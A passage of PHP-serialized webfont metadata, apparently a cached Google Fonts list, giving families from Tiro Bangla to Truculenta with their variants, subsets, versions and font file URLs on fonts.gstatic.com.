iro Bangla\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:7:\"bengali\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/tirobangla/v4/IFSgHe1Tm95E3O8b5i2V8MG9-UPeuz4i.ttf\";s:6:\"italic\";s:80:\"http://fonts.gstatic.com/s/tirobangla/v4/IFSiHe1Tm95E3O8b5i2V8PG_80f8vi4imBM.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1351;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Tiro Devanagari Hindi\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/tirodevanagarihindi/v3/55xyezN7P8T4e0_CfIJrwdodg9HoYw0i-M9fSOkOfG0Y3A.ttf\";s:6:\"italic\";s:102:\"http://fonts.gstatic.com/s/tirodevanagarihindi/v3/55x8ezN7P8T4e0_CfIJrwdodg9HoYw0i-M9vSuMKXmgI3F_o.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1352;O:8:\"stdClass\":8:{s:6:\"family\";s:23:\"Tiro Devanagari Marathi\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/tirodevanagarimarathi/v3/fC1xPZBSZHrRhS3rd4M0MAPNJUHl4znXCxAkotDrDJYM2lAZ.ttf\";s:6:\"italic\";s:107:\"http://fonts.gstatic.com/s/tirodevanagarimarathi/v3/fC1zPZBSZHrRhS3rd4M0MAPNJUHl4znXCxAkouDpBpIu30AZbUY.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1353;O:8:\"stdClass\":8:{s:6:\"family\";s:24:\"Tiro Devanagari Sanskrit\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/tirodevanagarisanskrit/v3/MCoAzBbr09vVUgVBM8FWu_yZdZkhkg-I0nUlb59pEoEqgtOh0w.ttf\";s:6:\"italic\";s:109:\"http://fonts.gstatic.com/s/tirodevanagarisanskrit/v3/MCoGzBbr09vVUgVBM8FWu_yZdZkhkg-I0nUlb59ZEIsuoNax06MM.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1354;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Tiro Gurmukhi\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:8:\"gurmukhi\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:82:\"http://fonts.gstatic.com/s/tirogurmukhi/v4/x3dmckXSYq-Uqjc048JUF7Jvly7HAQsyA2Y.ttf\";s:6:\"italic\";s:85:\"http://fonts.gstatic.com/s/tirogurmukhi/v4/x3d4ckXSYq-Uqjc048JUF7JvpyzNBSk3E2YljQ.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1355;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Tiro Kannada\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:7:\"kannada\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/tirokannada/v4/CSR44ztKmvqaDxEDJFY7CIYKSPl6tOU9Eg.ttf\";s:6:\"italic\";s:82:\"http://fonts.gstatic.com/s/tirokannada/v4/CSRm4ztKmvqaDxEDJFY7CIY6SvN-luAtEnKp.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1356;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Tiro Tamil\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:5:\"tamil\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/tirotamil/v4/m8JXjfVIf7OT22n3M-S_ULRvamODxdI.ttf\";s:6:\"italic\";s:78:\"http://fonts.gstatic.com/s/tirotamil/v4/m8JVjfVIf7OT22n3M-S_YLZlbkGG1dKEDw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1357;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Tiro Telugu\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:6:\"telugu\";}s:7:\"version\";s:2:\"v4\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/tirotelugu/v4/aFTQ7PxlZWk2EPiSymjXdKSNQqn0X0BO.ttf\";s:6:\"italic\";s:80:\"http://fonts.gstatic.com/s/tirotelugu/v4/aFTS7PxlZWk2EPiSymjXdJSPSK3WWlBOoas.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1358;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Titan One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/titanone/v13/mFTzWbsGxbbS_J5cQcjykzIn2Etikg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1359;O:8:\"stdClass\":8:{s:6:\"family\";s:13:\"Titillium Web\";s:8:\"variants\";a:11:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:7:\"regular\";i:5;s:6:\"italic\";i:6;s:3:\"600\";i:7;s:9:\"600italic\";i:8;s:3:\"700\";i:9;s:9:\"700italic\";i:10;s:3:\"900\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":11:{s:3:\"200\";s:87:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffAzHKIx5YrSYqWM.ttf\";s:9:\"200italic\";s:90:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbewI1zZpaduWMmxA.ttf\";s:3:\"300\";s:87:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffGjEKIx5YrSYqWM.ttf\";s:9:\"300italic\";s:90:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbepI5zZpaduWMmxA.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPecZTIAOhVxoMyOr9n_E7fRMTsDIRSfr0.ttf\";s:6:\"italic\";s:86:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPAcZTIAOhVxoMyOr9n_E7fdMbmCKZXbr2BsA.ttf\";s:3:\"600\";s:87:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffBzCKIx5YrSYqWM.ttf\";s:9:\"600italic\";s:90:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbe0IhzZpaduWMmxA.ttf\";s:3:\"700\";s:87:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffHjDKIx5YrSYqWM.ttf\";s:9:\"700italic\";s:90:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPFcZTIAOhVxoMyOr9n_E7fdMbetIlzZpaduWMmxA.ttf\";s:3:\"900\";s:87:\"http://fonts.gstatic.com/s/titilliumweb/v15/NaPDcZTIAOhVxoMyOr9n_E7ffEDBKIx5YrSYqWM.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1360;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Tomorrow\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:75:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLgrETNbFtZCeGqgR2xe2XiKMiokE4.ttf\";s:9:\"100italic\";s:78:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLirETNbFtZCeGqgRXXQwHoLOqtgE5h0A.ttf\";s:3:\"200\";s:76:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR0dWkXIBsShiVd4.ttf\";s:9:\"200italic\";s:79:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ63JDMCDjEd4yVY.ttf\";s:3:\"300\";s:76:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR15WUXIBsShiVd4.ttf\";s:9:\"300italic\";s:79:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ8nKDMCDjEd4yVY.ttf\";s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLmrETNbFtZCeGqgSXVcWHALdio.ttf\";s:6:\"italic\";s:75:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLgrETNbFtZCeGqgRXXe2XiKMiokE4.ttf\";s:3:\"500\";s:76:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR0hWEXIBsShiVd4.ttf\";s:9:\"500italic\";s:79:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ5HLDMCDjEd4yVY.ttf\";s:3:\"600\";s:76:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR0NX0XIBsShiVd4.ttf\";s:9:\"600italic\";s:79:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ73MDMCDjEd4yVY.ttf\";s:3:\"700\";s:76:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR1pXkXIBsShiVd4.ttf\";s:9:\"700italic\";s:79:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ9nNDMCDjEd4yVY.ttf\";s:3:\"800\";s:76:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR11XUXIBsShiVd4.ttf\";s:9:\"800italic\";s:79:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ8XODMCDjEd4yVY.ttf\";s:3:\"900\";s:76:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLhrETNbFtZCeGqgR1RXEXIBsShiVd4.ttf\";s:9:\"900italic\";s:79:\"http://fonts.gstatic.com/s/tomorrow/v15/WBLjrETNbFtZCeGqgRXXQ-HPDMCDjEd4yVY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1361;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Tourney\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v8\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GOQByZTp1I1LcGA.ttf\";s:3:\"200\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GuQFyZTp1I1LcGA.ttf\";s:3:\"300\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GZwFyZTp1I1LcGA.ttf\";s:7:\"regular\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GOQFyZTp1I1LcGA.ttf\";s:3:\"500\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GCwFyZTp1I1LcGA.ttf\";s:3:\"600\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7G5wZyZTp1I1LcGA.ttf\";s:3:\"700\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7G3gZyZTp1I1LcGA.ttf\";s:3:\"800\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GuQZyZTp1I1LcGA.ttf\";s:3:\"900\";s:104:\"http://fonts.gstatic.com/s/tourney/v8/AlZa_ztDtYzv1tzq1wcJnbVt7xseomk-tNs7qrzTWbyt8n7GkAZyZTp1I1LcGA.ttf\";s:9:\"100italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UKaJzBxAVfMGOPb.ttf\";s:9:\"200italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UIaJjBxAVfMGOPb.ttf\";s:9:\"300italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8ULEJjBxAVfMGOPb.ttf\";s:6:\"italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UKaJjBxAVfMGOPb.ttf\";s:9:\"500italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UKoJjBxAVfMGOPb.ttf\";s:9:\"600italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UJEITBxAVfMGOPb.ttf\";s:9:\"700italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UJ9ITBxAVfMGOPb.ttf\";s:9:\"800italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UIaITBxAVfMGOPb.ttf\";s:9:\"900italic\";s:106:\"http://fonts.gstatic.com/s/tourney/v8/AlZc_ztDtYzv1tzq_Q47flUUvI2wpXz29ilymEMLMNc3XHnT8UIzITBxAVfMGOPb.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1362;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Trade Winds\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/tradewinds/v17/AYCPpXPpYNIIT7h8-QenM3Jq7PKP5Z_G.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1363;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Train One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:8:\"cyrillic\";i:1;s:8:\"japanese\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/trainone/v13/gyB-hwkiNtc6KnxUVjWHOqbZRY7JVQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1364;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Trirong\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:7:\"regular\";i:7;s:6:\"italic\";i:8;s:3:\"500\";i:9;s:9:\"500italic\";i:10;s:3:\"600\";i:11;s:9:\"600italic\";i:12;s:3:\"700\";i:13;s:9:\"700italic\";i:14;s:3:\"800\";i:15;s:9:\"800italic\";i:16;s:3:\"900\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:4:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:4:\"thai\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v11\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:73:\"http://fonts.gstatic.com/s/trirong/v11/7r3EqXNgp8wxdOdOl-go3YRl6ujngw.ttf\";s:9:\"100italic\";s:75:\"http://fonts.gstatic.com/s/trirong/v11/7r3CqXNgp8wxdOdOn44QuY5hyO33g8IY.ttf\";s:3:\"200\";s:74:\"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOl0QJ_a5L5uH-mts.ttf\";s:9:\"200italic\";s:77:\"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QFa9B4sP7itsB5g.ttf\";s:3:\"300\";s:74:\"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlyAK_a5L5uH-mts.ttf\";s:9:\"300italic\";s:77:\"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QcaxB4sP7itsB5g.ttf\";s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/trirong/v11/7r3GqXNgp8wxdOdOr4wi2aZg-ug.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/trirong/v11/7r3EqXNgp8wxdOdOn44o3YRl6ujngw.ttf\";s:3:\"500\";s:74:\"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOl3gL_a5L5uH-mts.ttf\";s:9:\"500italic\";s:77:\"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QKa1B4sP7itsB5g.ttf\";s:3:\"600\";s:74:\"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOl1QM_a5L5uH-mts.ttf\";s:9:\"600italic\";s:77:\"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QBapB4sP7itsB5g.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlzAN_a5L5uH-mts.ttf\";s:9:\"700italic\";s:77:\"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QYatB4sP7itsB5g.ttf\";s:3:\"800\";s:74:\"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlywO_a5L5uH-mts.ttf\";s:9:\"800italic\";s:77:\"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QfahB4sP7itsB5g.ttf\";s:3:\"900\";s:74:\"http://fonts.gstatic.com/s/trirong/v11/7r3DqXNgp8wxdOdOlwgP_a5L5uH-mts.ttf\";s:9:\"900italic\";s:77:\"http://fonts.gstatic.com/s/trirong/v11/7r3BqXNgp8wxdOdOn44QWalB4sP7itsB5g.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1365;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Trispace\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"100\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbH9qoQl0zHugpt0.ttf\";s:3:\"200\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbP9roQl0zHugpt0.ttf\";s:3:\"300\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbCFroQl0zHugpt0.ttf\";s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbH9roQl0zHugpt0.ttf\";s:3:\"500\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbE1roQl0zHugpt0.ttf\";s:3:\"600\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbKFsoQl0zHugpt0.ttf\";s:3:\"700\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbJhsoQl0zHugpt0.ttf\";s:3:\"800\";s:107:\"http://fonts.gstatic.com/s/trispace/v18/Yq65-LKSQC3o56LxxgRrtA6yBqsrXL5GI5KI-IUZVGsxWFIlbP9soQl0zHugpt0.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1366;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Trocchi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/trocchi/v14/qWcqB6WkuIDxDZLcDrtUvMeTYD0.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1367;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Trochut\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/trochut/v20/CHyjV-fDDlP9bDIw5nSIfVIPLns.ttf\";s:6:\"italic\";s:73:\"http://fonts.gstatic.com/s/trochut/v20/CHyhV-fDDlP9bDIw1naCeXAKPns8jw.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/trochut/v20/CHymV-fDDlP9bDIw3sinWVokMnIllmA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1368;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Truculenta\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMlAjswcFHnJMMhg.ttf\";s:3:\"200\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMtAiswcFHnJMMhg.ttf\";s:3:\"300\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMg4iswcFHnJMMhg.ttf\";s:7:\"regular\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMlAiswcFHnJMMhg.ttf\";s:3:\"500\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMmIiswcFHnJMMhg.ttf\";s:3:\"600\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMo4lswcFHnJMMhg.ttf\";s:3:\"700\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMrclswcFHnJMMhg.ttf\";s:3:\"800\";s:129:\"http://fonts.gstatic.com/s/truculenta/